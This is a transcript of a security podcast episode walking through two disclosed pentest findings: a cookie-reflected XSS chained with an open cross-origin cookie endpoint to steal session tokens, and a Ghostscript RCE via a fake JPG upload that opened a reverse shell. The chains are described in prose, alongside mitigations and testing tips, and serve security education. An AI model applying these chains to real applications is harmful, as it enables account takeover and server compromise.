Hacked & Secured: Pentest Exploits & Mitigations

Ep. 10 – Cookie XSS & Image Upload RCE: One Cookie, One File, Full Control

Amin Malekpour Season 1 Episode 10

One cookie set on a subdomain triggered XSS and stole session tokens. One fake image upload gave the attacker a reverse shell.

This episode breaks down two powerful exploits—a cookie-based XSS that bypassed frontend protections, and an RCE through Ghostscript triggered by a disguised PostScript file.

Learn how subtle misconfigurations turned everyday features into full account and server compromise.

Chapters:

00:00 - INTRO

01:08 - FINDING #1 - Cookie-Controlled XSS

12:19 - FINDING #2 - Image Upload to RCE via Ghostscript

19:03 - OUTRO

Want your pentest discovery featured? Submit your creative findings through the Google Form in the episode description, and we might showcase your finding in an upcoming episode!

🌍 Follow & Connect → LinkedIn, YouTube, Twitter, Instagram
📩 Submit Your Pentest Findings → https://forms.gle/7pPwjdaWnGYpQcA6A
📧 Feedback? Email Us podcast@quailu.com.au
🔗 Podcast Website → Website Link

INTRO


What if a single cookie—set from a different subdomain—could be reflected into your HTML and quietly hijack your session?

And what if a basic logo upload box could be tricked into executing remote code… just by renaming a file?

In this episode, we’re unpacking two powerful exploits—one that turned cross-domain cookie handling into full account takeover, and another that abused Ghostscript to get a reverse shell from a fake image upload.

I’m Amin Malekpour, you’re listening to Hacked & Secured: Pentest Exploits & Mitigations, and this is the episode for the last Friday of June.

FINDING #1 - Cookie-Controlled XSS
 

Most pentesters look for XSS in the usual places—input fields, query parameters, maybe even headers. But what if I told you the injection point can be buried inside a browser cookie? And it gets even worse, that cookie wasn’t even set by the user—it was controlled by a totally different endpoint on a completely different subdomain. Now imagine that cookie gets reflected straight into a script tag on the main site. No sanitisation. No protection. Just full XSS waiting to happen.

That’s exactly what M7arm4n documented in his write-up on Medium.com —a cookie-based XSS vulnerability that chained together misconfigured endpoints and unsafe DOM reflection to steal user session tokens and take over accounts.

This wasn’t just one bug. It was a creative combination of smaller weaknesses chained into something serious.

Technically, it was a reflected Cross-Site Scripting bug. But this one wasn’t your typical “type something into a search box and see it pop up on the screen” situation.

Let’s break it down.

Usually, when we say “reflected XSS,” we’re talking about input that goes from the attacker, into the browser, and right back out on the page. Like putting your name in a URL parameter, and that name shows up somewhere on the site without any sanitisation. If the site doesn’t clean up the input, attackers can sneak in JavaScript instead of text.

But here’s the twist in this case: the injection point wasn’t a URL or a form field.

It was a cookie and that’s where the Document Object Model or DOM comes in. DOM is basically the page’s structure. It’s like a live map of all the HTML and elements on your screen. If something appears in the DOM, it means your browser sees it as part of the page.

And if a cookie’s value shows up in the DOM without being sanitised, that’s dangerous. Because it means an attacker could set a cookie, and then watch it get reflected on the page as live HTML.

But where it got really sneaky in this finding, was how the cookie got reflected.

On one of the application’s subdomains, there was an endpoint called “slash cookies” that let anyone set a cookie just by sending a POST request. No auth needed. No referer checks. Just give it a name and value, and boom—it writes that cookie to the entire parent domain.

This meant an attacker could set a cookie and that value would be sent to any subdomain within the application.

Setting cookies like that isn’t always dangerous. Most of the time, you still can’t do much with it, right?

But in this case… the attacker noticed that the main application reflected that cookie inside an HTML image tag. The cookie shows up in two spots on the page. In one spot, it's inside a normal <img> tag, and this instance is properly encoded, so its content is safely treated as plain text. However, in the other spot, the cookie appears inside a <noscript> tag and isn’t encoded at all.

And that’s where things got interesting.

Let’s take a second and explain what <noscript> tag is.

In general, when someone has JavaScript turned off in their browser, the browser shows whatever’s inside the <noscript> tag as a backup. It’s like saying, “Hey, your JavaScript isn’t working, so here’s some alternative content.”

But here’s the catch—most people do have JavaScript turned on. And in that case, the stuff inside <noscript> tag doesn’t actually get shown… but it’s still there in the HTML.

Now, if that <noscript> block includes something like a <script> tag or other HTML, some browsers might still try to parse it. And in certain edge cases, that can lead to unexpected behavior like your fallback code accidentally getting executed, even though it was supposed to be ignored.

Alright, let’s get back to our story.  Up to this point the attacker has two key ingredients.

First—there’s a public endpoint that lets you set cookies for the entire domain. No authentication, no validation. Just send a POST request, and the browser stores it like it came from the site itself.

Second—there’s a page on the main domain that reflects the value of a specific cookie right into a <noscript> tag. And here’s the kicker: that reflection isn’t encoded. Whatever you put in the cookie gets dropped straight into the page’s HTML.

Now pause for a second and think it through as a pentester. You’ve just found a way to set a cookie, and you know that exact cookie will later be reflected directly into the HTML—no sanitisation, no encoding.

That’s a rare opportunity, right? If this was your pentest, how would you turn this into something exploitable?

well, here’s what the attacker actually did.

They start by building a webpage on a domain they fully control. Think of it like a phishing site or a trap page—it’s not part of the vulnerable app, but it can still interact with it.

Now, to get victims onto that page, the attacker has options:

  • They might send a phishing email with a link.
  • Or drop it into a forum or comment thread where users of the app are active.
  • Or even embed it inside a malicious ad that silently loads on other websites.

The goal? Trick users into visiting the external page—where the real attack begins.

When a victim lands on the attacker’s page, a script runs in the background. It quietly sends a cross-origin POST request to the vulnerable application’s /cookies endpoint.

This endpoint allows anyone to set a cookie on the app’s domain—without validating the request’s origin or checking who’s making it.

Now the victim’s browser has a cookie scoped to the vulnerable app’s domain. And that cookie contains a malicious payload: a script tag, wrapped in a way that’s meant to break out of a <noscript> tag and load a second-stage script from the attacker’s server.

That’s Stage One of the attack.

The attacker’s page then redirects the victim to a real page on the vulnerable app. This page reflects that cookie directly into a <noscript> tag—without any encoding or sanitisation.

So what happens?

The browser loads the page, sees the cookie, inserts it into the DOM, and... the payload executes.

The <script> tag runs, and the second-stage code—hosted by the attacker—gets full control of the page context.

Now we enter Stage Two of the attack, where the real damage begins.

The injected script—hosted by the attacker—runs inside the victim’s browser. But instead of trying to access cookies directly, which wouldn’t work because they’re marked HttpOnly, it does something smarter. HttpOnly is a security flag you can set on cookies to make them inaccessible to JavaScript. If a cookie is marked HttpOnly, scripts running in the browser can’t read its value using document.cookie. This is meant to protect session cookies from being stolen via XSS.

So, instead of trying to access cookies directly, the script sends a GET request back to the “slash cookies” endpoint—but this time it’s asking for the value of the session cookie. Even though JavaScript can’t read the cookie directly, the browser still sends it along with the request.

The key point is: the attacker’s page doesn’t have to be on the same domain. Because the cookie-setting endpoint accepts cross-origin requests, as long as withCredentials flag is set to true, the browser will still send and receive cookies for the main application’s domain. withCredentials is a flag in JavaScript that tells the browser, “Hey, include cookies with this request—even if it’s cross-origin.” And the browser listens. As long as the server doesn’t block it, the victim’s session cookie gets sent along automatically.

And the “slash cookies” endpoint? It’s completely unprotected. It doesn’t check who’s asking or whether they’re allowed to see session data—it just replies with the raw value of the session cookie.

The attacker’s script then takes that response containing the session cookie and forwards it to their own server using another request. No alerts. No UI. No JavaScript console. Just quiet, reliable cookie theft.

And just like that… they have full session hijack. 

This is the kind of vulnerability that requires both technical depth and creative thinking. The attacker had to:

  • Discover an open cookie-setting endpoint.
  • Figure out that a specific cookie was reflected into the DOM.
  • Inject a payload that escaped noscript tag and executed.
  • Chain it with a second-stage request that bypassed CORS and exfiltrated a secure token.

All without ever touching a traditional input field.

Could this attack still work today?

Absolutely—if you’re not careful. Subdomain-controlled endpoints are everywhere. And developers often forget that client-side cookie access isn’t the only risk. Sometimes, it’s the server that reflects them back into dangerous places.

Alright, if you're building, designing, or securing applications, here’s how to prevent this kind of issues:

First—never reflect cookie values directly into the page, especially not inside things like <img> or <noscript> tags. If you really need to show a cookie value, make sure it’s properly encoded and you’re only using data you fully trust.

Second—don’t expose endpoints that let users set cookies, especially not without strict checks. If an attacker can set a cookie for someone else, that’s game over. Use a strict allowlist of which cookies can be set, check the Referer or Origin headers to verify where the request came from, and block anything that looks suspicious.

And finally—watch your subdomains. One weak subdomain is all it takes to bring down the whole app. Audit them regularly and treat each one like it could be a potential entry point.

And, if you’re a pentester, here’s what to look for in your daily engagements:

Always check subdomains for cookie-handling endpoints. Look for anything like “slash cookies,” “set_cookie,” or similar endpoints. If you find one that lets you set a cookie for the main domain, that’s a big red flag.

Next, see where those cookies get used. Are they reflected into the HTML? Inside <script>, <img>, or <noscript> tags? That’s where things can get dangerous.

And remember: XSS doesn’t always start with an input field. Sometimes, it’s a misused browser feature. Sometimes, it’s a cookie no one thought would ever be risky.

And do not forget the most dangerous attacks aren’t loud—they’re subtle. They slip through cracks that no one noticed… until it’s too late

FINDING #2 - Image Upload to RCE via Ghostscript

 

We started this episode with a cookie-based XSS that let attackers hijack user sessions through a clever combination of misconfigured subdomains, unsafe DOM reflection, and a little-known trick involving the <noscript> tag. But now, let’s pivot to something from a different nature.
 
What if I told you that simply uploading a company logo could give an attacker full remote code execution on the server?
 
 That’s exactly what Frans Rosen documented in a public HackerOne report—an RCE vulnerability triggered through a crafted image file. It sounds simple. Upload a file, get a shell. But what made this attack special was the unexpected chain of technologies behind it.
 
 Let’s break this down—especially for those learning how real-world RCE chains happen.
 
 At the core of this attack was a tool called ImageMagick. It’s used by many applications to handle images—resize them, compress them,  and generate thumbnails. ImageMagick is powerful—but that power comes with risk. It supports a ton of file types, including some dangerous ones like EPS and PostScript.
 
 And here’s the problem.
 
 ImageMagick uses another program called Ghostscript to process certain types of files—especially things like PDFs, EPS, or PostScript images.

And here’s the risky part: Ghostscript can run code.

So if it’s not properly sandboxed or restricted, an attacker can upload a file that looks like an image—but actually contains malicious PostScript commands. And when the server tries to process that file using Ghostscript, it ends up executing those commands.
 So let’s walk through how this attack worked.
 
 Frans started with a feature that let users upload logos inside a report constructor. This feature accepted JPG, PNG, and other image formats.
 
 But behind the scenes, it passed uploaded files through ImageMagick—and ImageMagick hadn’t been properly locked down.
 
 So instead of uploading a normal image, Frans crafted a PostScript file. PostScript is a page description language—it looks like an image file to the system, but it can include code that Ghostscript will try to interpret.
 
 His payload used a trick to trigger Ghostscript’s device configuration. It included a line that told the system: “Set your output to this command…” and then injected a bash reverse shell.
 
 That’s it.
 
 The attacker uploaded a file with a .jpg extension—it looked like a normal image. But inside, it actually contained PostScript code. When ImageMagick tried to process the upload, it handed it off to Ghostscript. And since Ghostscript wasn’t properly sandboxed, the server just executed the payload—no warnings, no filters. 
 
 The reverse shell connected back to Frans’ server, giving him full remote command execution.
 
 He could now list directories, read sensitive files, and inspect the backend system.
 
 And here’s where it gets even better.
 
 At first, he wasn’t sure if this was a real production server or just some isolated test instance. So he ran a few follow-up commands—like reading /etc/hosts and exploring internal directories from the shell—and that’s when he confirmed it: the server was definitely part of the live platform.

So let’s pause for a second, if you were the attacker—and you just got a shell on the server by uploading an image—what would be your next move?

Would you dump environment variables and search for credentials?

Start scanning for config files with hardcoded secrets?

Or maybe pivot deeper—looking for internal services, databases, or cloud metadata?

Remember RCE isn’t the endgame—it’s the beginning. It’s the foothold that opens everything else.

And what makes this one so dangerous is how simple it was.

No SQL injection. No complex exploit chain.
 Just a weak image upload filter… and an old version of Ghostscript quietly waiting in the background.


 So if you’re building, designing or securing applications, here’s what you should do.

  • Never trust image uploads blindly. Validate the content type—not just the file extension.
  • Use a locked-down ImageMagick policy to explicitly block risky file types like PostScript, EPS, PDF, or XPS. These aren’t needed for typical image uploads.
  • Treat every upload as untrusted input, and handle it in a sandboxed environment.
  • And finally—keep your libraries up to date. This bug relied on a vulnerable Ghostscript version that had already been patched in newer releases.


 And, for the pentesters out there, here’s how you can find similar issues in your daily engagements:

  • Don’t just check if the server blocks certain extensions. Go deeper. Ask: What happens after the file is uploaded? Is it resized? Compressed? Parsed by tools like ImageMagick, ExifTool, or Ghostscript? Because that’s where the real danger hides.
  • Try uploading a seemingly harmless .jpg file that’s actually a PostScript file in nature. Then monitor what the server does with it. Look for signs of execution—DNS callbacks, reverse shells, or even system errors. Those are clues the file was processed and maybe even executed.
  • Don’t trust filters on the frontend. Just because the UI says “JPG only” doesn’t mean the backend is enforcing it properly. Intercept the request with Burp suit, change the Content-Type or filename, and see what gets through.
  • And here’s something many people miss: fingerprint the toolchain. If you suspect ImageMagick is in use, try uploading a crafted file that triggers a crash or error. The error messages or behaviour might tell you if Ghostscript is running underneath.

Sometimes, the most dangerous vulnerabilities are buried inside the features we trust the most. This one didn’t need complex chains or deep fuzzing. It was just a simple upload box. The right file. The right moment. And it ended with a shell. 

OUTRO


The most dangerous flaws we saw today didn’t rely on brute force or deep fuzzing.
 They slipped through because everyone trusted the wrong thing—a cookie from another subdomain, an image that wasn’t really an image, and a tool quietly running behind the scenes.

And that’s the real lesson: attackers don’t break systems by force—they move through the cracks no one’s watching.
 That’s why we test. That’s why we share. And that’s why responsible disclosure matters.
 Because finding flaws isn’t enough—getting them fixed is what actually protects people.

If this episode opened your eyes to something new, send it to someone who’s building, testing, or securing applicaitons. You never know—this might be the story that saves them from getting breached.

Let’s make cybersecurity knowledge accessible to all. See you in the next episode.

People on this episode